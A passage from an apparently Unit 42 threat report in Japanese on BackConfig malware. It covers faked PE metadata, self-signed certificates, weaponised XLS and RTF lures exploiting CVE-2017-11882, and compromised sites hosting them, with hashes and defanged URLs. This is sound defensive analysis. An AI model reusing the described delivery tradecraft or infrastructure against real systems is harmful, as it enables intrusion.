PE\u30b3\u30f3\u30d1\u30a4\u30eb\u6642\u9593\u3068\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u30c7\u30b8\u30bf\u30eb\u7f72\u540d(\u521d\u56de\u89b3\u6e2c\u65e5\u6642\u9806)<\/em><\/span><\/p>\n<p>\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb(SHA256: 84e5629...)\u306b\u683c\u7d0d\u3055\u308c\u3066\u3044\u308b\u30b3\u30f3\u30d1\u30a4\u30eb\u65e5\u6642\u306f\u3001\u5f0a\u793e\u306eWildFire\u5206\u6790\u30b7\u30b9\u30c6\u30e0\u306b\u3088\u3063\u3066\u521d\u3081\u3066\u78ba\u8a8d\u3055\u308c\u305f\u65e5\u6642\u3088\u308a\u3082\u5f8c\u3067\u3042\u308b\u3088\u3046\u306b\u898b\u3048\u307e\u3059\u3002PE\u30d5\u30a1\u30a4\u30eb\u306e\u30bf\u30a4\u30e0\u30b9\u30bf\u30f3\u30d7\u304c\u30b3\u30f3\u30d1\u30a4\u30eb\u5f8c\u306b\u5909\u66f4\u3055\u308c\u305f\u53ef\u80fd\u6027\u3082\u3042\u308a\u307e\u3059\u304c\u3001\u3053\u306e\u5947\u5999\u306a\u70b9\u306f\u304a\u305d\u3089\u304f\u30bf\u30a4\u30e0\u30be\u30fc\u30f3\u306b\u3088\u3063\u3066\u8aac\u660e\u3067\u304d\u307e\u3059\u3002\u592a\u5e73\u6d0b\u6642\u9593\u306e19\u65e523\u664249\u5206\u306f\u3001\u30d0\u30f3\u30b0\u30e9\u30c7\u30b7\u30e5\u3067\u306f20\u65e5\u306e13\u664249\u5206\u3067\u3059\u3002\u307e\u305f\u3001UTC\u306e\u5348\u524d7\u664226\u5206\u306f\u3001\u5357\u30a2\u30b8\u30a2\u5730\u57df\u3067\u306f11\u664226\u5206\u304b\u308913\u664226\u5206\u307e\u3067\u306e\u7bc4\u56f2\u3067\u3059\u3002\u305d\u3046\u3059\u308b\u3068\u3001\u30b5\u30f3\u30d7\u30eb\u306e\u30b3\u30f3\u30d1\u30a4\u30eb\u306f\u3001\u305d\u306e\u914d\u4fe1\u306e\u76f4\u524d\u306b\u884c\u308f\u308c\u305f\u3053\u3068\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<p>\u81ea\u5df1\u7f72\u540d\u30c7\u30b8\u30bf\u30eb\u8a3c\u660e\u66f8\u306e\u8a73\u7d30\u304a\u3088\u3073\u5b8c\u5168\u306a\u30cf\u30c3\u30b7\u30e5\u306b\u3064\u3044\u3066\u306f\u3001\u3053\u306e\u30ec\u30dd\u30fc\u30c8\u306eIOC\u30bb\u30af\u30b7\u30e7\u30f3\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n<p>\u4ee5\u4e0b\u306e\u8868\u306b\u3001\u540c\u3058PE\u30d5\u30a1\u30a4\u30eb\
u304b\u3089\u53ce\u96c6\u3057\u3066\u30d5\u30a1\u30a4\u30eb\u8aac\u660e\u30d5\u30a3\u30fc\u30eb\u30c9\u3067\u30b0\u30eb\u30fc\u30d7\u5316\u3057\u305f\u30d0\u30fc\u30b8\u30e7\u30f3\u60c5\u5831\u3092\u793a\u3057\u307e\u3059\u3002\u8868\u793a\u9806\u306f\u3001\u30b5\u30f3\u30d7\u30eb(SHA256: 18ce3ee...)\u4ee5\u5916\u306f\u540c\u3058\u3067\u3059\u3002\u30b5\u30f3\u30d7\u30eb(SHA256: 18ce3ee...)\u304c\u6700\u521d\u306b\u78ba\u8a8d\u3055\u308c\u305f\u306e\u306f2020\u5e741\u670816\u65e5\u3067\u3059\u304c\u3001\u4f55\u3089\u304b\u306e\u7406\u7531\u3067\u30012\u30013\u304b\u6708\u524d\u306e\u30b5\u30f3\u30d7\u30eb(\u540d\u524d\u306fLink Finder)\u3067\u78ba\u8a8d\u3055\u308c\u305f\u306e\u3068\u307e\u3063\u305f\u304f\u540c\u3058\u30d0\u30fc\u30b8\u30e7\u30f3\u60c5\u5831\u306b\u623b\u3063\u3066\u3044\u307e\u3057\u305f\u3002<\/p>\n<table style=\"width: 100%; height: 356px;\">\n<tbody>\n<tr style=\"height: 48px;\">\n<td style=\"height: 48px;\"><strong>SHA256<\/strong><\/td>\n<td style=\"height: 48px;\"><strong>\u30d5\u30a1\u30a4\u30eb\u8aac\u660e<\/strong><\/td>\n<td style=\"height: 48px;\"><strong>\u30d5\u30a1\u30a4\u30eb\u30d0\u30fc\u30b8\u30e7\u30f3<\/strong><\/td>\n<td style=\"height: 48px;\"><strong>\u88fd\u54c1\u540d<\/strong><\/td>\n<td style=\"height: 48px;\"><strong>\u88fd\u54c1\u30d0\u30fc\u30b8\u30e7\u30f3<\/strong><\/td>\n<td style=\"height: 48px;\"><strong>\u8457\u4f5c\u6a29\u60c5\u5831<\/strong><\/td>\n<\/tr>\n<tr style=\"height: 48px;\">\n<td style=\"height: 48px;\">84e5629\u2026<\/td>\n<td style=\"height: 48px;\">\u0410\u043b\u044c\u0431\u0435\u0440\u0442\u00a0<strong>(\u82f1\u8a9e\u3067\u306fAlbert)<\/strong><\/td>\n<td style=\"height: 48px;\">06.10.2015<\/td>\n<td style=\"height: 48px;\">\u0410\u043b\u044c\u0431\u0435\u0440\u0442<\/td>\n<td style=\"height: 48px;\">01.05.2015<\/td>\n<td style=\"height: 48px;\">Copyright @ 2015-2026 secosec<\/td>\n<\/tr>\n<tr style=\"height: 30px;\">\n<td style=\"height: 30px;\">4a4bc01\u2026<\/td>\n<td style=\"height: 92px;\" 
rowspan=\"3\">\u0421\u0441\u044b\u043b\u043a\u0430<strong>(\u82f1\u8a9e\u3067\u306fLink)<\/strong><\/td>\n<td style=\"height: 92px;\" rowspan=\"3\">01.01.12<\/td>\n<td style=\"height: 92px;\" rowspan=\"3\">\u0441\u0441\u044b\u043b\u043a\u0430<\/td>\n<td style=\"height: 92px;\" rowspan=\"3\">10.01.2015<\/td>\n<td style=\"height: 92px;\" rowspan=\"3\">Copyright @ 2011-2021 secosec Inc. \u0412\u0441\u0435 \u043f\u0440\u0430\u0432\u0430 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u044bk\u00a0<strong>(\u82f1\u8a9e\u3067\u306fAll rights reserved)<\/strong><\/td>\n<\/tr>\n<tr style=\"height: 31px;\">\n<td style=\"height: 31px;\">91c67c1\u2026<\/td>\n<\/tr>\n<tr style=\"height: 31px;\">\n<td style=\"height: 31px;\">de5b670\u2026<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"height: 24px;\">18ce3ee\u2026<\/td>\n<td style=\"height: 72px;\" rowspan=\"3\">Link Finder<\/td>\n<td style=\"height: 72px;\" rowspan=\"3\">01.01.12<\/td>\n<td style=\"height: 72px;\" rowspan=\"3\">Link Finder<\/td>\n<td style=\"height: 72px;\" rowspan=\"3\">13,9,1632<\/td>\n<td style=\"height: 72px;\" rowspan=\"3\">Copyright @2011-2020 Techtest Inc. 
All Rights Reserved<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"height: 24px;\">f79ebf0\u2026<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"height: 24px;\">31faeef\u2026<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"height: 24px;\">d87b875\u2026<\/td>\n<td style=\"height: 24px;\">scrapper<\/td>\n<td style=\"height: 24px;\">01.12.001<\/td>\n<td style=\"height: 24px;\">scrapper<\/td>\n<td style=\"height: 24px;\">13,6,1662<\/td>\n<td style=\"height: 24px;\">Copyright @Scrapper Ltd Reserved<\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"height: 72px;\">1510996\u2026<\/td>\n<td style=\"height: 72px;\">system process<\/td>\n<td style=\"height: 72px;\">2,1,1,2015<\/td>\n<td style=\"height: 72px;\">system process cleaner<\/td>\n<td style=\"height: 72px;\">2,1,1,2015<\/td>\n<td style=\"height: 72px;\">Copyright \u00a9 2004-2018 Foxit Software Inc. All Rights Reserved<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><em>\u88682. 
PE\u30d0\u30fc\u30b8\u30e7\u30f3\u60c5\u5831\u30e1\u30bf\u30c7\u30fc\u30bf\u306e\u8aac\u660e(\u521d\u56de\u89b3\u6e2c\u65e5\u6642\u9806\u3001\u4e00\u81f4\u30c7\u30fc\u30bf\u306b\u3088\u308a\u30b0\u30eb\u30fc\u30d7\u5316)<\/em><\/span><\/p>\n<p>\u3053\u306e\u4e2d\u3067\u306f\u3001\u30d5\u30a1\u30a4\u30eb(SHA256: 1510996...)\u304c\u3001Foxit\u306e\u8457\u4f5c\u6a29\u60c5\u5831\u3068\u81ea\u5df1\u7f72\u540d\u30c7\u30b8\u30bf\u30eb\u8a3c\u660e\u66f8\u3092\u4f7f\u7528\u3057\u3066\u3001\u3055\u3089\u306b\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306e\u30a2\u30a4\u30b3\u30f3\u3068\u3057\u3066\u4ee5\u4e0b\u306e\u56f3\u306b\u793a\u3059\u4f01\u696d\u30ed\u30b4\u3092\u4f7f\u7528\u3057\u3066\u304a\u308a\u3001\u30c6\u30fc\u30de\u3068\u3044\u3046\u70b9\u3067\u6700\u3082\u4e00\u8cab\u6027\u304c\u3042\u308a\u307e\u3059\u3002\u30d5\u30a1\u30a4\u30eb\u306e\u8457\u4f5c\u6a29\u60c5\u5831\u306f\u3001Foxit\u306eReader\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u306e\u8457\u4f5c\u6a29\u60c5\u5831\u3068\u6bd4\u8f03\u3057\u3066\u30d4\u30ea\u30aa\u30c9\u8a18\u53f7\u304c1\u3064\u6b20\u3051\u3066\u3044\u308b\u3060\u3051\u3067\u3042\u308b\u3053\u3068\u304b\u3089\u3001\u4f5c\u6210\u3057\u305f\u306e\u3067\u306f\u306a\u304f\u3001\u30b3\u30d4\u30fc\u3057\u305f\u3053\u3068\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u653b\u6483\u8005\u306f\u3053\u306e\u5f8c\u3001\u898b\u305f\u3068\u3053\u308d\u67b6\u7a7a\u306e\u4f01\u696d\u540d\u3068\u88fd\u54c1\u540d\u3092\u4f7f\u7528\u3059\u308b\u3088\u3046\u306b\u306a\u308a\u307e\u3059\u304c\u3001\u30c7\u30b8\u30bf\u30eb\u7f72\u540d\u3067\u306f\u7f72\u540d\u8005\u306e\u540d\u524d\u3092\u6df7\u305c\u3066\u4f7f\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u904e\u53bb11\u304b\u6708\u9593\u306f\u3001\u30d5\u30a1\u30a4\u30eb\u30a2\u30a4\u30b3\u30f3\u306f\u307e\u3063\u305f\u304f\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002<\/p>\n<p>\u6700\u8fd1\u306e\u30b5\u30f3\u30d7\u30eb\u306b\u306f\u3001\u30d5\u30a1\u30a4\u30eb\u8aac\u660e\u3001\u88fd\u54c
1\u540d\u3001\u304a\u3088\u3073\u8457\u4f5c\u6a29\u306e\u5404\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u3001\u4e0a\u8a18\u306e\u8868\u3067\u7ffb\u8a33\u4ed8\u304d\u3067\u793a\u3057\u305f\u3088\u3046\u306b\u3001\u30ad\u30ea\u30eb\u6587\u5b57\u306e\u30c6\u30ad\u30b9\u30c8\u3082\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u308c\u304c\u3001BackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u51fa\u6240\u3092\u3054\u307e\u304b\u305d\u3046\u3068\u3059\u308b\u8a66\u307f\u306a\u306e\u304b\u3001\u305d\u308c\u3068\u3082\u88ab\u5bb3\u7d44\u7e54\u5185\u306e\u7279\u5b9a\u306e\u30bf\u30fc\u30b2\u30c3\u30c8\u306b\u5bfe\u3057\u3066\u3088\u308a\u95a2\u9023\u6027\u306e\u9ad8\u3044\u30b3\u30f3\u30c6\u30f3\u30c4\u306b\u3059\u308b\u305f\u3081\u306e\u8a66\u307f\u306a\u306e\u304b\u3092\u77e5\u308b\u3053\u3068\u306f\u56f0\u96e3\u3067\u3059\u3002<\/p>\n<h3>\u914d\u4fe1\u3068\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb<\/h3>\n<p>\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u306f\u3001\u5f0a\u793e\u306e\u9867\u5ba2\u306e\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u3067\u78ba\u8a8d\u3057\u305f\u5185\u5bb9\u304a\u3088\u3073\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u306e\u8abf\u67fb\u3092\u901a\u3058\u3066\u78ba\u7acb\u3057\u305f\u60c5\u5831\u306b\u57fa\u3065\u3044\u3066\u3001\u3055\u307e\u3056\u307e\u306a\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u914d\u4fe1\u3059\u308b\u65b9\u6cd5\u306b\u3064\u3044\u3066\u8aac\u660e\u3057\u307e\u3059\u3002Unit 
42\u306f\u3001BackConfig\u306e\u914d\u4fe1\u306b\u4f7f\u7528\u3055\u308c\u305f\u5175\u5668\u5316\u3055\u308c\u305f\u6587\u66f8\u304c\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb\u306b\u6dfb\u4ed8\u3055\u308c\u3001\u30e1\u30fc\u30eb\u306b\u8a18\u8f09\u3055\u308c\u3066\u3044\u308b\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0URL\u30ea\u30f3\u30af\u304cHangover\u30b0\u30eb\u30fc\u30d7\u306e\u624b\u53e3\u3067\u3042\u308b\u3088\u3046\u306b\u898b\u3048\u308b\u3068\u3044\u3046\u8a3c\u62e0\u306f\u307e\u3060\u78ba\u8a8d\u3057\u3066\u3044\u307e\u305b\u3093\u3002<\/p>\n<p>\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u306e\u6b8b\u308a\u306e\u90e8\u5206\u3067\u306f\u3001\u4e3b\u306bMicrosoft Excel\u6587\u66f8\u306eOLE\u306b\u6ce8\u76ee\u3057\u307e\u3059\u3002\u306a\u305c\u306a\u3089\u3053\u308c\u306f\u3001\u5c11\u306a\u304f\u3068\u3082BackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u95a2\u3057\u3066\u306f\u3001Hangover\u30b0\u30eb\u30fc\u30d7\u304c\u901a\u5e38\u4f7f\u7528\u3059\u308b\u624b\u6bb5\u3060\u304b\u3089\u3067\u3059\u3002\u3057\u304b\u3057\u3001Unit 42\u306f\u3001\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306e\u5206\u6790\u3092\u901a\u3058\u3066\u3001C2\u30c9\u30e1\u30a4\u30f3matissues[.]com\u3092\u4f7f\u7528\u3057\u3001\u540c\u3058\u65e5\u306b\u5175\u5668\u5316\u3055\u308c\u305fRTF(\u30ea\u30c3\u30c1 \u30c6\u30ad\u30b9\u30c8 \u30d5\u30a9\u30fc\u30de\u30c3\u30c8)\u30d5\u30a1\u30a4\u30eb(SHA256: 752c173555edb49a2e1f18141859f22e39155f33f78ea70a3fbe9e2599af3d3f)\u306b\u3088\u3063\u3066\u30c9\u30ed\u30c3\u30d7\u3055\u308c\u305f\u3001BackConfig PE\u30b5\u30f3\u30d7\u30eb(SHA256: 
e28f1bc0b0910757b25b2146ad02798ee6b206a5fe66ce68a28f4ab1538d6a1f\u3001\u521d\u56de\u89b3\u6e2c\u65e5\u6642\u306f2019\u5e7410\u670824\u65e5)\u3092\u898b\u3064\u3051\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002\u3053\u306eRTF\u306f\u3001Office\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u306e\u5f0f\u30a8\u30c7\u30a3\u30bf\u30fc\u306e\u8106\u5f31\u6027\u306b\u5bfe\u3057\u3066<a href=\"https:\/\/portal.msrc.microsoft.com\/en-US\/security-guidance\/advisory\/CVE-2017-11882\">CVE-2017-11882<\/a>\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u4f7f\u7528\u3057\u3066PE\u30b5\u30f3\u30d7\u30eb\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u3053\u306e\u60aa\u7528\u65b9\u6cd5\u306f\u3001\u3053\u308c\u307e\u3067\u306b\u5206\u6790\u3057\u305f\u3069\u306e\u30b5\u30f3\u30d7\u30eb\u3068\u3082\u7570\u306a\u308b\u3082\u306e\u3067\u3057\u305f\u3002<\/p>\n<h3>\u4fb5\u5bb3\u3055\u308c\u305f\u30b5\u30fc\u30c9\u30d1\u30fc\u30c6\u30a3\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3<\/h3>\n<p>\u3053\u308c\u307e\u3067\u306b\u898b\u3064\u3051\u305f\u30b5\u30f3\u30d7\u30eb\u304b\u3089\u53d6\u5f97\u3057\u305f\u30c7\u30fc\u30bf\u3092\u4e2d\u5fc3\u306b\u8abf\u67fb\u3092\u7d9a\u884c\u3057\u305f\u3068\u3053\u308d\u3001BackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u914d\u4fe1\u3092\u652f\u63f4\u3059\u308b\u4fb5\u5bb3\u3055\u308c\u305f\u30b5\u30fc\u30c9\u30d1\u30fc\u30c6\u30a3\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u305f\u3044\u304f\u3064\u304b\u306eURL\u3092\u767a\u898b\u3057\u307e\u3057\u305f\u3002\u4ee5\u4e0b\u306e\u8868\u306b\u3001Circular_No_03.xls (SHA256: 0aa5cf1025be21b18ab12d8f8d61a6fa499b3bbcdbdced27db82209b81821caf)\u3001Circullar_Nov_2017.xls (SHA256: 
ed638b5f33d8cee8f99d87aa51858a0a064ca2e6d59c6acfdf28d4014d145acb)\u306a\u3069\u306e\u3001(\u305f\u3068\u3048\u30b9\u30da\u30eb\u304c\u9593\u9055\u3063\u3066\u3044\u308b\u3068\u3057\u3066\u3082)\u305d\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\u304c\u5927\u52e2\u306e\u4eba\u3005\u306b\u914d\u5e03\u3055\u308c\u308b\u6587\u66f8\u3084\u5e83\u544a\u3067\u3042\u308b\u3001\u307e\u305f\u306f\u305d\u308c\u3089\u306b\u95a2\u9023\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u793a\u5506\u3059\u308b\u30d5\u30a1\u30a4\u30eb\u540d\u3092\u6301\u3064\u5175\u5668\u5316\u3055\u308c\u305fXLS\u30d5\u30a1\u30a4\u30eb\u3092\u914d\u4fe1\u3057\u3066\u3044\u308b\u3001\u4fb5\u5bb3\u3055\u308c\u305f\u30b5\u30a4\u30c8\u306e\u4f8b\u3092\u3044\u304f\u3064\u304b\u793a\u3057\u307e\u3059\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>SHA-256<\/strong><\/td>\n<td><strong>\u521d\u56de\u89b3\u6e2c<\/strong><\/td>\n<td><strong>\u95a2\u9023 URL<\/strong><\/td>\n<td><strong>\u8aac\u660e<\/strong><\/td>\n<td><strong>\u5834\u6240<\/strong><\/td>\n<\/tr>\n<tr>\n<td>be3f12b\u2026<\/td>\n<td>2019-10<\/td>\n<td>http:\/\/nsaimmigration[.]com\/userfiles\/image\/fbr.php and nphp_registration_form.php (\u3069\u3061\u3089\u3082HTTP 404)<\/td>\n<td>\u6d77\u5916\u306b\u5728\u7559\u30fb\u7559\u5b66\u3059\u308b\u5b66\u751f\u3092\u652f\u63f4\u3059\u308b\u30b3\u30f3\u30b5\u30eb\u30bf\u30f3\u30c8\u304a\u3088\u3073\u6cd5\u5f8b\u76f8\u8ac7\u306e\u4f01\u696d<\/td>\n<td>\u30d1\u30ad\u30b9\u30bf\u30f3<\/td>\n<\/tr>\n<tr>\n<td>0aa5cf1\u2026<\/td>\n<td>2018-09<\/td>\n<td>http:\/\/webtechhub[.]com\/wordpress\/wp-content\/images\/fbr_circular.php<\/td>\n<td>\u6642\u4ee3\u9045\u308c\u306eWordPress\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308bWeb\u30c7\u30b6\u30a4\u30f3\u30fb\u958b\u767a\u30b5\u30a4\u30c8<\/td>\n<td>\u30d1\u30ad\u30b9\u30bf\u30f3<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\">ed638b5\u2026<\/td>\n<td 
rowspan=\"2\">2017-11<\/td>\n<td>http:\/\/alphamike.com[.]mv\/housing<\/td>\n<td>\u8ca8\u7269\u306e\u8f38\u9001\u30fb\u914d\u9001\u3092\u884c\u3046\u904b\u9001\u4f1a\u793e<\/td>\n<td>\u30e2\u30eb\u30c7\u30a3\u30d6<\/td>\n<\/tr>\n<tr>\n<td>http:\/\/mgamphs.edu[.]bd\/info\/ (\u505c\u6b62)<\/td>\n<td>Muhurigonj Academy of Music and Performance High School. (<a href=\"https:\/\/twitter.com\/malwrhunterteam\/status\/928619159306555392\">\u53c2\u8003<\/a>)<\/td>\n<td>\u30d0\u30f3\u30b0\u30e9\u30c7\u30b7\u30e5<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><em>\u88683. BackConfig\u306e\u914d\u4fe1\u3092\u652f\u63f4\u3059\u308b\u305f\u3081\u306b\u4fb5\u5bb3\u3055\u308c\u305f\u30b5\u30fc\u30c9\u30d1\u30fc\u30c6\u30a3\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3<\/em><\/span><\/p>\n<p>\u3053\u308c\u3089\u306e\u8105\u5a01\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u3066\u3044\u308b\u6a19\u7684\u304a\u3088\u3073\u4fb5\u5bb3\u3055\u308c\u305f\u30b5\u30fc\u30c9\u30d1\u30fc\u30c6\u30a3\u306eWeb\u30b5\u30a4\u30c8\u304b\u3089\u5224\u65ad\u3057\u3066\u3001\u5f0a\u793e\u306f\u3001\u4e0a\u8a18\u306eURL\u306e\u4e00\u90e8\u3067\u300cfbr\u300d\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u306e\u306f\u30d1\u30ad\u30b9\u30bf\u30f3\u306e\u9023\u90a6\u6b73\u5165\u5e81(FBR)\u306b\u95a2\u9023\u3057\u3066\u3044\u308b\u53ef\u80fd\u6027\u304c\u9ad8\u3044\u3068\u78ba\u4fe1\u3057\u3066\u3044\u307e\u3059\u3002\u300cfbr\u300d\u3068\u3044\u3046\u30c6\u30fc\u30de\u306f\u3001VBA\u30de\u30af\u30ed\u30b3\u30fc\u30c9\u3067\u3082\u898b\u3064\u304b\u308a\u307e\u3059\u3002\u30d5\u30a1\u30a4\u30ebed638b5...\u306b\u306f\u3001Const WelcomePage = 
\"FBR\"\u3068\u3044\u3046\u30b9\u30c6\u30fc\u30c8\u30e1\u30f3\u30c8\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u88683\u306e\u4fb5\u5bb3\u3055\u308c\u305f\u30db\u30b9\u30c6\u30a3\u30f3\u30b0\u306e\u53e4\u3044\u4f8b\u3067\u306f\u3001\u5175\u5668\u5316\u3055\u308c\u305fXLS\u30d5\u30a1\u30a4\u30eb\u3092\u914d\u4fe1\u3059\u308b\u306e\u306b\u30b5\u30fc\u30d0\u30fc\u5074\u306ePHP\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u4f7f\u7528\u3057\u3066\u3044\u307e\u305b\u3093\u3002\u4ee3\u308f\u308a\u306b\u3001\u30da\u30fc\u30b8\u3067\u5358\u7d14\u306bHTTP\u5fdc\u7b54\u30b9\u30c6\u30fc\u30bf\u30b9301 (Moved Permanently)\u3092\u4f7f\u7528\u3057\u3066\u3001\u524d\u8ff0\u306eXLS\u3078\u306eURL\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\u3092\u5b9f\u884c\u3057\u3001\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3092\u958b\u59cb\u3057\u307e\u3059\u3002\u6700\u8fd1\u306e\u4f8b\u3067\u306f\u3001\u300cfbr\u300d\u306a\u3069\u306e\u30bd\u30fc\u30b7\u30e3\u30eb \u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0 \u30c6\u30fc\u30de\u306b\u4e00\u81f4\u3059\u308bURL\u30d5\u30a1\u30a4\u30eb\u540d\u3092\u6301\u3064PHP\u3092\u4f7f\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u307e\u305f\u3001\u653b\u6483\u8005\u306f\u3001PHP\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u4f7f\u7528\u3057\u3066\u3001\u30da\u30fc\u30b8\u306e\u3042\u3089\u3086\u308b\u8a2a\u554f\u8005\u306b\u3064\u3044\u3066\u30a4\u30d9\u30f3\u30c8\u306e\u30bf\u30a4\u30e0\u30b9\u30bf\u30f3\u30d7\u3001\u30af\u30e9\u30a4\u30a2\u30f3\u30c8 \u30aa\u30da\u30ec\u30fc\u30c6\u30a3\u30f3\u30b0 
\u30b7\u30b9\u30c6\u30e0\u3001\u304a\u3088\u3073IP\u30a2\u30c9\u30ec\u30b9\u3092\u300cinfo.txt\u300d\u3068\u3044\u3046\u540d\u524d\u306e\u30d5\u30a1\u30a4\u30eb\u306b\u66f8\u304d\u8fbc\u3093\u3067\u8a18\u9332\u3057\u307e\u3059\u3002<\/p>\n<p>\u4fb5\u5bb3\u3055\u308c\u305f\u30b5\u30fc\u30c9\u30d1\u30fc\u30c6\u30a3\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306e\u5834\u6240\u307e\u305f\u306f\u305d\u308c\u3089\u3092\u5408\u6cd5\u7684\u306b\u4f7f\u7528\u3059\u308b\u7d44\u7e54\u306f\u3001Unit 42\u304c\u78ba\u8a8d\u3057\u305f\u6a19\u7684\u3068\u6574\u5408\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u307e\u3063\u305f\u304f\u306e\u5076\u7136\u304b\u3001\u8105\u5a01\u653b\u6483\u8005\u304c\u6a19\u7684\u306e\u56fd\u306e\u5927\u898f\u6a21\u306a\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u3092\u5229\u7528\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u793a\u3059\u5146\u5019\u304b\u3001\u307e\u305f\u306f\u8105\u5a01\u653b\u6483\u8005\u304c\u60f3\u5b9a\u3057\u3066\u3044\u308b\u88ab\u5bb3\u8005\u3068\u305d\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30bd\u30ea\u30e5\u30fc\u30b7\u30e7\u30f3\u304c\u3088\u308a\u4fe1\u983c\u3067\u304d\u308b\u3068\u8003\u3048\u3066\u3044\u308b\u53ef\u80fd\u6027\u304c\u3042\u308b\u56fd\u5185\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u3092\u5229\u7528\u3057\u3066\u3044\u308b\u304b\u306e\u3044\u305a\u308c\u304b\u3067\u3042\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306eWildFire\u30b5\u30f3\u30c9\u30dc\u30c3\u30af\u30b9\u304c2017\u5e7411\u67088\u65e5\u306b\u30b5\u30f3\u30d7\u30ebed638b5...\u3092\u5206\u6790\u3057\u305f\u3068\u3053\u308d\u3001\u4e0a\u8a18\u306e\u8868\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u306f\u30d0\u30f3\u30b0\u30e9\u30c7\u30b7\u30e5\u306e\u5b66\u6821\u3068\u30e2\u30eb\u30c7\u30a3\u30d6\u306e\u904b\u9001\u4f1a\u793e
\u306e\u4fb5\u5bb3\u3055\u308c\u305f2\u3064\u306eWeb\u30b5\u30a4\u30c8\u3067\u30db\u30b9\u30c8\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002Unit 42\u306f\u30e2\u30eb\u30c7\u30a3\u30d6\u8af8\u5cf6\u306b\u304a\u3051\u308bHangover\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u78ba\u8a8d\u3057\u3066\u3044\u307e\u305b\u3093\u304c\u3001\u3053\u306e\u5730\u306f\u4ed6\u306e\u65e2\u77e5\u306e\u6a19\u7684\u3068\u4e26\u3076\u5730\u57df\u306b\u5b58\u5728\u3057\u3001\u8208\u5473\u6df1\u3044\u3053\u3068\u306bUnit 